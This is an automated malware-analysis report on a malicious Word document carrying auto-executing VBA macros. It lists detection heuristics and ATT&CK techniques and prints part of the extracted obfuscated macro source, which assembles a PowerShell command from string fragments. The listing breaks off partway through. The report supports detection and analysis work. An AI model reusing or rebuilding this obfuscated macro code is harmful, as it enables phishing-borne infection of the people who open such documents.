Verdict: MALICIOUS
Risk Score: 142

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing VBA macros. A critical heuristic firing indicates the presence of a Shell() call within the VBA code. The extracted VBA script attempts to construct and execute a PowerShell command, likely to download and run a second-stage payload. The AutoOpen macro marker further suggests automatic execution upon opening.
Heuristics (5)

- VBA macros detected (medium, 2 related findings) [OLE_VBA_MACROS]: Document contains VBA macro code.
- Shell() call in VBA (critical) [OLE_VBA_SHELL]: Shell() call in VBA.
- AutoOpen macro (high) [OLE_VBA_AUTOOPEN]: AutoOpen macro.
- Legacy WordBasic auto-exec macro marker (medium) [OLE_LEGACY_WORDBASIC_AUTOEXEC]: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info) [EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body).
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 151287 bytes |

SHA-256 of macros.bas: fc092062c2a1524ac1832f507418614c353cc1ac567b58cf9b1d976ff6e69004
Preview script: first 1,000 lines of the extracted script (the listing below is cut off where the report truncates it).

```vb
Attribute VB_Name = "nkmURXXZ"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function CnpSzAKtzW()
On Error Resume Next
wiXmQIXtTwG = (RGjPIvjwNM - CLng(271724) + RfjCZD + Fix(ALwaJt / CDbl(495505 * Sqr(GzQHCYpQjqf))) - 583503 / Sin(jjOwEi - PGHkFzqIw + rqwmVCwSrKo - 928918 + CDbl(rqwmVCwSrKo)) * 847456 * Fix(271724))
XVoriIK = "p8r*'fFO5Bx1HNeT6P35Yi8Lo3CJDCANrBbZPrNQyFex7ZXREqoJyYP6zs8TSvAowershell & ((GEt-varIabLe '*uMd4lwXQRg)nZHL"
crJwwHbFj = Left(Right(XVoriIK, 45), 30) + Left(Right(XVoriIK, 14), 2) + Left(Right(XVoriIK, 106), 3) + CStr(Left(Right(XVoriIK, 5), 1))
jQXzS = "M8P'TASJ5KStK9BEjWB2rWm.NaME[3,11,2]-joIN'')((('SABzBMBpLRHBcabTmHU8Qm2k682a((mumIPXPYz"
jiiMul = Left(Right(jQXzS, 64), 25) + Left(Right(jQXzS, 11), 3) + CStr(Left(Right(jQXzS, 84), 1))
WTvdJLrZ = Chr(43)
cBEBwQqUvw = "VMP2M8PB'klHWJnsa9BEjWB2rWmxtH"
mPjwOTZ = CStr(Left(Right(cBEBwQqUvw, 22), 9)) + CStr(Left(Right(cBEBwQqUvw, 4), 1))
QHCniXMZls = "dklVMP"
wwsVhkuu = Left(Right(QHCniXMZls, 5), 2)
FzcZYBGlS = Chr(43)
VIbQhZsXXk = "VMP2MmkldmkJ5KStK9lEj"
aDTfRZ = CStr(Left(Right(VIbQhZsXXk, 16), 6)) + Left(Right(VIbQhZsXXk, 3), 1)
wqNOcLvLwXf = (avBOjXA - CLng(433273) + lYTKD + Fix(hdYaUu / CDbl(681836 * Sqr(YcpHwtXD))) - 985192 / Sin(FiihS - oURLXA + YXCLO - 261128 + CDbl(YXCLO)) * 88784 * Fix(433273))
sPOXFmvKoT = Chr(43)
IqUGfUvkC = "VMP2M8PmklasdmktK9BEjWB2lWm"
uJAHdiA = CStr(Left(Right(IqUGfUvkC, 20), 8)) + CStr(Left(Right(IqUGfUvkC, 3), 1))
PvodzhnYQq = Chr(43)
vhdsZGbCj = "VMP2M8Pmkl = mktK9BEjWB2lWm"
fOzfmMUnXw = CStr(Left(Right(vhdsZGbCj, 20), 8)) + CStr(Left(Right(vhdsZGbCj, 3), 1))
UQBLCwm = Chr(43)
jqpamW = "VMP2M8PBTASJmkl&(ys8nys8mWmxtHYsibYBPBjklyQ30"
nPlfWvD = Left(Right(jqpamW, 33), 13) + CStr(Left(Right(jqpamW, 6), 2))
RqSOfUBoHw = Chr(43)
PfhXioDFu = "dPmklP2M8"
OvIqctAbY = Left(Right(PfhXioDFu, 7), 3)
ONEFUYUiYIl = (TiKjLidf - CLng(771622) + ivYWtiV + Fix(tXLQb / CDbl(713982 * Sqr(OhYTMf))) - 8970 / Sin(wkzEQFPX - aEEhkSfjbu + ZfkZGsUwwmL - 50396 + CDbl(ZfkZGsUwwmL)) * 446366 * Fix(771622))
zUiImhTPf = Chr(43)
WowZjjEjSQw = "VMP2ys8mkASJ5KSlK9"
wYzPiZiHHN = Left(Right(WowZjjEjSQw, 14), 5) + Left(Right(WowZjjEjSQw, 3), 1)
SFbaVkECW = Chr(43)
kvKdRFhZiT = "dPmk'P2M8"
DhPjmwHSQVb = Left(Right(kvKdRFhZiT, 7), 3)
WDBbnDOpqpD = Chr(43)
NJzEW = "VMP2'leysASJ5KS8K9"
fPGhQzPMIrs = Left(Right(NJzEW, 14), 5) + Left(Right(NJzEW, 3), 1)
jjsaXorrGY = Chr(43)
kiKKrGK = (SBwLoGjiJW - CLng(895373) + OYbji + Fix(OdVizn / CDbl(936583 * Sqr(lroENNCp))) - 19390 / Sin(APGQRfwqJP - SrrJujzdd + EUOaazSbVv - 773393 + CDbl(EUOaazSbVv)) * 642479 * Fix(895373))
kmXZhQJqi = "dy'VMP"
inipAOTQ = Left(Right(kmXZhQJqi, 5), 2)
VAVkYzFVkY = Chr(43)
STzqnjiZoo = "VMP2's8mkASJ5KSlK9"
YDbSfZdr = Left(Right(STzqnjiZoo, 14), 5) + Left(Right(STzqnjiZoo, 3), 1)
dhWJz = Chr(43)
sVqXSaFc = "VMP2M8Pmklw-omktK9BEjWB2lWm"
kbaFKHzcM = CStr(Left(Right(sVqXSaFc, 20), 8)) + CStr(Left(Right(sVqXSaFc, 3), 1))
pXcFnucw = Chr(43)
OzEMVcM = "VMP2MmklbmkJ5KStK9lEj"
AaLMKb = CStr(Left(Right(OzEMVcM, 16), 6)) + Left(Right(OzEMVcM, 3), 1)
bLIndMkrM = Chr(43)
CnpSzAKtzW = crJwwHbFj + jiiMul + WTvdJLrZ + mPjwOTZ + wwsVhkuu + FzcZYBGlS + aDTfRZ + sPOXFmvKoT + uJAHdiA + PvodzhnYQq + fOzfmMUnXw + UQBLCwm + nPlfWvD + RqSOfUBoHw + OvIqctAbY + zUiImhTPf + wYzPiZiHHN + SFbaVkECW + DhPjmwHSQVb + WDBbnDOpqpD + fPGhQzPMIrs + jjsaXorrGY + inipAOTQ + VAVkYzFVkY + YDbSfZdr + dhWJz + kbaFKHzcM + pXcFnucw + AaLMKb + bLIndMkrM
End Function
Function uiNRYaOop()
On Error Resume Next
mltJzziu = (AwXUZjqu - CLng(671998) + iDOllnPi + Fix(olkGp / CDbl(105301 * Sqr(MQPsHiIsDX))) - 511850 / Sin(cqwEp - uuqwOAzFtV + uIrtGiHJUzm - 956155 + CDbl(uIrtGiHJUzm)) * 988142 * Fix(671998))
zjsBnE = "VMP2M8PBmkljecymk9BEjWB2rWlxtH"
jZwOz = CStr(Left(Right(zjsBnE, 22), 9)) + CStr(Left(Right(zjsBnE, 4), 1))
XzjijG = Chr(43)
QawM
```

... (truncated)